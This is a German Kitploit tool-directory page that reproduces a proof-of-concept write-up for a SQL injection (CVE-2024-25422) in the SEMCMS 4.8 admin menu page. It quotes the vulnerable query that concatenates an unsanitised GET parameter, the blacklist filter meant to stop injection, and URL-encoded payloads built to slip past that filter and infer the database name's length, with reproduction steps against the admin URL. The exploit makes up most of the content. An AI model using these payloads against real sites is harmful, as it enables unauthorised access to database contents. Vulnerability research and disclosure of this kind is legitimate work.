Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
semcms — semcms weist eine SQL-Injection auf (CVE-2024-25422) | Kitploit
Tools/GitHubGitHub/tzyyyyyyy/semcms
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubtzyyyyyyy/semcms

semcms

semcms weist eine SQL-Injection auf (CVE-2024-25422)

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Einführung in Semcms

SEMCMS ist ein Content-Management-System (CMS) für Außenhandels-Websites, das mehrere Sprachen unterstützt.

root@kitploit:~
v4.8 Download Link: http://www.sem-cms.com/TradeCmsdown/php/semcms_php_4.8.zip

Ursachen der Schwachstellen:

/xcR45q_Admin/SEMCMS_Menu.php Zeile 66

Schwachstellencode:

root@kitploit:~
<?php
 } elseif ($type == "edit") {
 
   $row = mysqli_fetch_array($db_conn->query("SELECT * FROM sc_menu WHERE ID=" . $_GET["ID"]));
 
   ?>

Es ist ersichtlich, dass die ID hier eine SQL-Anweisung ausführt, wenn Parameter über GET übergeben werden

Filtercode in /Include/contorl. PHP

Zeile 151

root@kitploit:~
function test_input($data) { 
    //$data = str_replace("%", "percent", $data);
    $data = trim($data);
    $data = stripslashes($data);
    $data = htmlspecialchars($data,*ENT_QUOTES*);
    return $data;
  }

Und die 8. Zeile

root@kitploit:~
function inject_check_sql($sql_str) {
 
   return preg_match('/select|and|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile/i',$sql_str); 
 } 
 function verify_str($str) { 
    if(inject_check_sql($str)) {
      exit('Sorry,You do this is wrong! (.-.)');
     } 
   return $str;
 } 

Durch das Filtern des obigen Inhalts können wir ein Payload konstruieren

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,53,36)

Reproduktion der Schwachstellen

Rufen Sie eine Website auf

root@kitploit:~
http://url/xcR45q_Admin/SEMCMS_Menu.php

Brupsuite-Paketerfassung, da die Länge des Datenbanknamens beim Erstellen einer neuen Site 5 beträgt, wird das Payload wie folgt konstruiert

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,53,36)

(Bestimmen, ob die Länge des Datenbanknamens 5 ist)

Payload einfügen, um Echo anzuzeigen

clip_image002

Ändern Sie nun das Payload

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,54,36)

(Bestimmen, ob die Länge des Datenbanknamens 6 ist)

Ändern Sie nun das Payload

clip_image004

SQL-Injection kann basierend auf zukünftigen Änderungen auf der Seite fortgesetzt werden

Tool herunterladen